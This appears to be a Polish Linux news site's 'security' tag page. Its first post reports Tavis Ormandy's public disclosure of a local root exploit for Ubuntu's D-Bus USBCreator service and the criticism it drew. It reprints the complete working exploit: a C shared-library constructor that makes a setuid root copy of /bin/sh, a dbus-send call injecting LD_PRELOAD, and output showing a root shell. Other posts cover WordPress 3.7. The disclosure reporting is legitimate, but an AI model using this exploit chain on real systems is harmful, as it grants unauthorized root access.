Tags Posts tagged with "security"

security

przez -
13 3058
Security - bezpieczeństwo

Na liście dyskusyjnej OSS Security, Tavis Ormandy opublikował przykładowy kod exploita, który umożliwia uzyskanie praw roota na czystej instalacji systemu Ubuntu. Błąd znajduje się w usłudze D-Bus. Okazuje się także, że autor otrzymał ostrą reprymendę od Seth Arnold i Marc Deslauriers z Canonical oraz Solar Designer z OpenWall za publiczne ujawnienie tego typu podatności. Według założeń polityki bezpieczeństwa firmy Canonical, tego typu luki posiadają wysoki priorytet i są objęte embargiem tajności. Kurt Seifried z Red Hata oznajmił także, że będzie omawiał osobiście błąd i ewentualne poprawki z Tavisem Ormandy.

Poniżej przykładowy exploit:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Warto zapoznać się z całym tematem na liście dyskusyjnej.

przez -
5 334
WordPress

Andrew Nacin ogłosił wydanie WordPress 3.7 Basie, wolnego i otwartego systemu CMS do tworzenia stron internetowych oraz blogów. Napisany jest w języku PHP, wykorzystuje bazę danych MySQL i jest wydawany na licencji GPLv2. Najnowsze wydanie jest poświęcone pamięci amerykańskiego pianisty jazzowego, kompozytora i bandlidera – Williama James Basie.

Najważniejsze zmiany:

  • Ciche aktualizacje: Od teraz nie musimy się już martwić aktualizacjami, ponieważ CMS zrobi to automatycznie za nas
  • Silniejsza metryka sprawdzania wpisywanych haseł
  • Udoskonalono lokalizację, w tym szybkość tłumaczenia na poszczególne języki

Polecane

Prasa, Czasopismo

1 811
Ukazało się Linux Magazine – numer 161. Lipcowe wydanie magazynu zawiera analizę tworzenia bardziej czytelnych wyrażeń regularnych z Simple Regex Language, instrukcje zabezpieczania i...